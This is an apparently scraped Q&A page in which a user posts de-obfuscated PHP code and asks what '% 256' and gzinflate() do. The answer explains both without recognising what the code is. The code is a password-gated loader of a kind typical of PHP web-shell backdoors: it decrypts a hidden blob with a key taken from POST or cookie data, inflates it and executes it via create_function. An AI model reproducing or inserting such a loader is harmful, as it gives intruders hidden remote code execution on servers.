dsjfrkvn818747 2016-01-02 06:55
浏览 46
已采纳

加密的PHP代码

Issue

I have some PHP code that I've been decrypting (de-obfuscating) for 2 hours. I finally got it converted back into readable code, but I still have some issues understanding the algorithm used here, because of lack of knowledge about some things in the code below.

Code

<?php

$posted = isset($_POST['posted']) ? $_POST['posted'] : (isset($_COOKIE['posted']) ? $_COOKIE['posted'] : NULL);
if ($posted!==NULL) {
    $posted= md5($posted) . substr(md5(strrev($posted)), 0, strlen($posted));
    for ($counter=0; $counter < 15324; $counter++)    {
        $idk[$counter] = chr((ord($idk[$counter]) - ord($posted[$counter])) % 256);
        $posted.=$idk[$counter];
    }

    if($idk = @gzinflate($idk)) {
        if (isset($_POST['posted']))
            @setcookie('posted', $_POST['posted']);
        $counter = create_function('', $idk);
        unset($idk, $posted);
        $counter();
    }
}

The $idk variable is already a value that contains a long string that's being base64 decoded.

What I Don't Understand

I understand almost all of the code, but I don't get what % 256 does in here and also I don't know what gzinflate() does.

  • 写回答

1条回答 默认 最新

  • dtc66318 2016-01-02 07:13
    关注

    So, gzinflate() un-compresses input data that is compressed with the zlib DEFLATE algorithm. The corresponding function to compress or deflate an uncompressed string is called gzdeflate(), and it's manual page provides a bit more information:

    This function compresses the given string using the DEFLATE data format.

    For details on the DEFLATE compression algorithm see the document "DEFLATE Compressed Data Format Specification version 1.3" (RFC 1951). Sparing a few details, this is similar to compressing a file using gzip myfile.txt on the Linux command line, which would create the compressed file myfile.txt.gz. In short, this is uncompressing compressed data assigned to $idk.

    $variable % 256 returns the remainder of dividing $variable by 256. If I set $variable to 258, $variable % 256 would be 2. This is often used when you want to see if a number is cleanly-divisible by another number. If I wanted to show a status-update every 100 times of a loop, for example, I might do:

    <?php

for ($i = 1; $i <= 1000; ++$i)
{
    // Do something on each loop.

    if (($i % 100) == 0)
    {
        echo sprintf("Loop %d of 1000; %d percent complete.
", $i, $i / 1000 * 100);
    }
}

    But there are obviously many other uses.

    As far as helping you figure out what exactly this source code does, I would recommend going through it step-by-step with real input and seeing what happens after each step. It will be hard for me to figure out much more about what it's doing without a lot more context.

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论

报告相同问题?

悬赏问题

  • ¥15 想问一下树莓派接上显示屏后出现如图所示画面,是什么问题导致的
  • ¥100 嵌入式系统基于PIC16F882和热敏电阻的数字温度计
  • ¥15 cmd cl 0x000007b
  • ¥20 BAPI_PR_CHANGE how to add account assignment information for service line
  • ¥500 火焰左右视图、视差(基于双目相机)
  • ¥100 set_link_state
  • ¥15 虚幻5 UE美术毛发渲染
  • ¥15 CVRP 图论 物流运输优化
  • ¥15 Tableau online 嵌入ppt失败
  • ¥100 支付宝网页转账系统不识别账号